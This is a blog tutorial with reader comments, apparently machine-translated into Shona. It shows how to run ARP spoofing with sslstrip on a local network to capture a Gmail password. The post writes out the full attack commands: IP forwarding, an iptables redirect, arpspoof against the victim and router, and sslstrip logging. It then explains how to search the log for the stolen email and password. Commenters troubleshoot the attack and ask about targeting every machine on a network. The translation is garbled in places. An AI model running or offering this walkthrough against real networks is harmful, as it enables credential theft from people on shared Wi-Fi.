ArpSpoofing uye SSlstrip muKushanda.

Mhoro maBloggi.

Kwemazuva ano ndine sampuro diki yekuti zvingave nengozi sei kuve nekubatana kune chero isina kuchengetedzwa network yeaya anodiwa nevazhinji vedu.

Kwemazuva ano, ndiri kuzoshandisa ArpSpoofing neSslstrip kuwana password yeGmail. Kuita kuti nharaunda iratidzike, ini ndakagadzira account inonzitestarp@gmail.com".

Uye sezvo ini ndisingade zvekutanga zvakanyanya, ngatidzikei kubhizinesi.

Ini handina mhosva chero nguva yezvavanogona kuita nerinotevera ruzivo. Ini ndinozviitira chete kune zvinangwa zvekudzidzisa

ZVAKAITIKA

Kune uyu muedzo izvo zvatiinazvo zvinotevera:

1. Anorwisa: Iyo desktop yangu kana komputa yedesktop ine Debian Wheezy. Kubva kuzvitoro iwe zvaunogona kuisa sslstrip y dsniff kuwana kuva harpspoofing

2. Akakuvadzwa: Iye akabatwa iri Android Hwendefa iyo inongoda chete kuona tsamba yake kuburikidza nebrowser.

3. Svikiro: Iyo yepakati ndeyangu Cisco DPC2425 Router

ADDRESSES.

Attacker kero: 172.26.0.2

Kero yeRouter: 172.26.0.1

Kero Yeakakuvara: 172.26.0.8

KURWISA:

Kuti unzwisise zvishoma kuti kurwisa kunoshanda sei, unogona kuenda kune yangu yekare POST

Chinhu chekutanga chatichaitira kurwisa uku kuita kuti kumberi kuitike kuti komputa yedu ikwanise kuendesa ruzivo kune akabatwa iye asingazvione. (Zvikasadaro kunenge kuri kuramba kwevhisi kurwisa)

Nezve izvo isu zvatichashandisa:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Wese kuraira mune yakananga koni hwindo.

Zvino kana tichiita muswe -f kubva ku linux tinoona ruzivo rwuchirarama uye rwakananga

 

snapshot1

 

Saka saka tinowana sei zvatinoda?

Ngatitangei kupinda tsamba yedu paThebhu Tichipinda mukati, tinoona kuti zviuru nezviuru zvezvinhu zvinoonekwa pane yedu console.

Iye zvino zvaunenge wapedza isu ticha vhura yedu faira "desdelinux" na nano

nano desdelinux

naControl + W isu tinotsvaga chimwe chinhu chinonzi CHINONYANYA KUTUMIRA

Uye isu tichaona chakadai.

 

snapshot2

 

Pakati peiyo tambo huru iyo isingaonekwe email yemunhu uye password.

Saka isu tinomhanya kurudyi kudzamara isu tazoona mwenje kumagumo kwetangi.

 

snapshot3

 

Pane imwe nguva tichaona kuti tingazvidzivirira sei zvishoma kubva pakurwiswa uku.

Reply with quote


Izvo zviri muchinyorwa zvinoomerera pamisimboti yedu ye tsika dzekunyora. Kuti utaure chikanganiso tinya pano.

Makomendi gumi, siya zvako

Siya yako yekutaura

Your kero e havazobvumirwi ichibudiswa.

*

*

  1. Inotarisira iyo data: Miguel Ángel Gatón
  2. Chinangwa cheiyo data: Kudzora SPAM, manejimendi manejimendi.
  3. Legitimation: Kubvuma kwako
  4. Kutaurirana kwedata
  5. Dhata yekuchengetedza: Dhatabhesi inobatwa neOccentus Networks (EU)
  6. Kodzero: Panguva ipi neipi iwe unogona kudzora, kupora uye kudzima ruzivo rwako

  1.   @Jlcmx akadaro

    Ini ndinotora uyu mukana kutaura kuti pakatumirwa posvo, mirairo yakanga isiri iyo.

    Iwo iptables yekuraira kumagumo iri kushayikwa iyo 8080 iri pane mumwe mutsetse. Uye ipapo arpspoof mirairo yaive yese pamutsetse mumwe chete. Mutemo wega wega uri pane imwe tambo.

    Ndinovimba mupepeti anozviona uye anogona kuzvigadzirisa.

    Thanks.

    1.    Bhuku reManyuko akadaro

      Ini ndaita zvekugadzirisa zvawataura, ndizvo here?

      Kana iwe uchizoisa kodhi mune yakasarudzika yekupinda, shandisa iyo HTML kuona, uye simbisa kuti chinyorwa chiri chokwadi usati watumira icho kuchakamirira. Ndatenda.

  2.   Luis akadaro

    Zvinotyisa kuziva kuti avo vedu vasina ruzivo vari panjodzi dzakanyanya. Ruzivo rwakanaka kwazvo kunyangwe pandinonzwisisa zvishoma yenyaya ndinoona kukosha kwayo. Ndatenda!
    Reply with quote

  3.   Giskard akadaro

    Asi izvo zvinongoshanda chete kana iye anorwisa uye akabatwa vari pane imwechete network. Chero zvazvingaitika, zvinoratidzika kwandiri kuti kana (uri pane imwechete network) ukabatanidza uchishandisa HTTPS izvo hazviitike nekuti iyo data yakavharidzirwa usati Wasiya muchina wako. Kana iwe ukabatanidza neHTTP (isina S) ini ndinofunga kuti kunyangwe kutarisa netambo tambo unoona makiyi.

    1.    @Jlcmx akadaro

      Haisi chokwadi. Ndiri kubiridzira gmail password uye kana iwe ukaona gmail inoshandisa https. Saka? Iyo poindi ndeyekuti kunyangwe https yakachengeteka, zvinoenderana ne http. Saka haina kuchengetedzeka kudaro.

      Usapupure zvakanyanya nezve https kuti iyo S haisi yeSuperman ndeye "safe"

    2.    Rten akadaro

      inoshanda ne kana isina https, ndakayedza neine hunyanzvi linux distro uye inoshanda pasina matambudziko

    3.    Bhuku reManyuko akadaro

      Unogona kunyatsoishandisa kudzidzisa chidzidzo kune avo vanoba yako Wi-Fi. 😀

      Izvo zvakati kana zvishoma senge izvo zvavakaudza nguva refu yapfuura pane Chema Alonso's blog:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonant akadaro

        Ostia, zvakanaka! / Uyezve ivo vanotaurira paranoid yangu pese pandinoshandisa iyo VPN pavanenge vachienda kunotarisa iyo bank account ...). Nenzira, iwe unofanirwa kuona kuti vanhu vanotsoropodza vari sei mumashoko ... kana pakupedzisira iri kuba ...

        1.    eliotime3000 akadaro

          Iye zvino tinoda kutora dzidziso yekuti ungagadzira sei uye upe yako VPN sevhisi.

      2.    Daniel akadaro

        Iyo nyaya iyo iwe yaunobatanidza inonakidza kwazvo, inoita kunge inokodzera bhuku reruzivo, uye izvi zvinoita kuti ndirangarire pandakashandisa internet yevavakidzani vangu uye kunyangwe ndichiti ndinoziva nyaya iyi, ndinofunga kuti ndaisatomboona iwo madimikira echokwadi e njodzi yandaigona kuve nayo yekupedzisira, nerombo rakanaka kwandiri, ivo vakango chinja password kuita WPA2 uye ndipo pakatangira nyaya yangu neIP

    4.    Mauricio akadaro

      Ndosaka zita racho richiti Sslstrip muchiito.

      Inoshanda, chero bedzi uyo anorwisa ari pakati

  4.   anon akadaro

    Ndeipi wave iwe yaunoshanda pane prism? -.-
    aihwa.
    Chii chauri kumirira kutumira chako chikumbiro XD
    Kwazisa
    post yakanaka

  5.   auroszx akadaro

    Zvinonakidza, ndichaita bvunzo yekudzidzisa gare gare ... Pamwe ndinogona kubvisa password kuWiFi ndombofara kwechinguva 😛
    Nemukana chero upi zvawo, unogona here kuita chimwe chinhu chakafanana kutumira mapeji akasiyana kune iwo akanangwa? Semuenzaniso, ivo vanoda kuvhura Facebook uye ini ndinovaendesa kuGoogle? 😛

    1.    @Jlcmx akadaro

      Ehe. Asi iwo ese akasiyana roll.

      Pamwe ndozotumira gare gare.

  6.   newnewbie akadaro

    yakanaka kwazvo posvo, idzi misoro inodzidzisa kwazvo, ikozvino isu tinofanirwa kukwanisa kupokana nekurwiswa uku, sezvo vamwe (seni) vanobatana neruzhinji network (yunivhesiti semuenzaniso) zvingave zvinobatsira kuzvidzivirira.

    Ndinokutendai!

  7.   kungo-mumwe-dl-mushandisi akadaro

    Izvo hazvina kundishandira 🙁

  8.   wow akadaro

    Chimwe chinhu chinonditadzisa pano, kunze kwekuti iyo https yekubatanidza yakavharidzirwa kuburikidza neserver chitupa (kana uchinge uine chitupa pamushini wako, bhurawuza rako riri pamusoro peiyo encryption) ine iptables iwe unonangidzira chiteshi 80 (http), kwete 443 inova https

    1.    @Jlcmx akadaro

      Ndakafunga saizvozvo. Iyo poindi ndeyekuti kunyangwe https iri "yakachengeteka" zvinosuruvarisa zvinoenderana ne http. Saka sslstrip inotora mukana weizvozvo, zvinoita kuti bhurawuza itende kuti iri kushandisa zvitupa zve https asi haisi.

      1.    wow akadaro

        utsvene! asi bhurawuza rinofanira kuona yambiro yakadai sekuti "ichi chitupa chinouya kubva kune inofungidzirwa saiti kana chimwe chakadai" ... ndichafanirwa kuita bvunzo XD

        1.    @Jlcmx akadaro

          Kwete, zvachose hapana chinobuda.

  9.   kungo-mumwe-dl-mushandisi akadaro

    Yakazo shandira ini
    Ini ndakabatana pane WEP network ine password, uye yakandiratidza iyo password zvakananga zvakadaro.

    Mubvunzo. Iwe unogona here kuita izvi zvakafanana maitiro asi kune ese makomputa akasunganidzwa mune network, panzvimbo yekuve nemunhu mumwe akabatwa?

    1.    @Jlcmx akadaro

      Hongu unokwanisa. Asi ini handina kumboedza. Edza iwe pachako uye utiudze kuti uri sei.

  10.   sinnick19 akadaro

    Chinhu chega chandinowana neichi ndechekuti muchina wemunhu akabirwa hausi kubuda, asi iyo sslstrip haina kundiratidza chero chinhu: /

    1.    @Jlcmx akadaro

      Iwe unofanirwa kudzima firewall kwechinguva. Kana zvirinani inogonesa inouya kubatana.

  11.   VaBlack akadaro

    Ini naProbe taingoona chete zita rekushandisa uye password yeiyo facebook peji, mune gmail ini handina kuwana mhedzisiro murogi, zvakare ini ndaingoda arpspoof mutsetse «arpspoof -i -t«. Kune rimwe divi, muchina wekubiwa haukwanise kuvhura mamwe mapeji. Ini ndicharamba ndichiongorora, zvinonakidza kwazvo. Rubatsiro kune avo vanoshandisa Manjaro, mapakeji ekuisa ndeaya: dsniff (heino arpspoff), yakakombama uye python2-pyopenssl. Sslstrip inogona kutorwa pasi kubva apa: http://www.thoughtcrime.org/software/sslstrip/
    Kuti umhanye iyo $ python2 sslstrip.py
    Thanks.

  12.   VaBlack akadaro

    Haina kubuda asi arpspoof mutsetse ndewe: #arpspoof -i int -t ip-victim ip-router

  13.   gilbert akadaro

    tarisa ndinoita chaizvo zvaunotaura:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A KUFANANA -p tcp -kugadza-chiteshi-80 -j REDIRECT -kuenda-kuzviteshi 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    Dambudziko nderekuti nyajambwa, ndiani imwe pc yandinayo muno mumba mangu, akasara asina kubatana kusvika pakuti ndinofanira kutangazve router, chii chandingaite, ndibatsireiwo.

    Chimwe chinhu, ini ndiri kushanda nemuchina chaiwo, uye kana ndichiita iyo iwconfig yekuraira, wlan0 haioneke, kana kana ndichiita ifconfig, zvisinei kana ndine internet pamushini wangu chaiwo chii chine eth0 interface.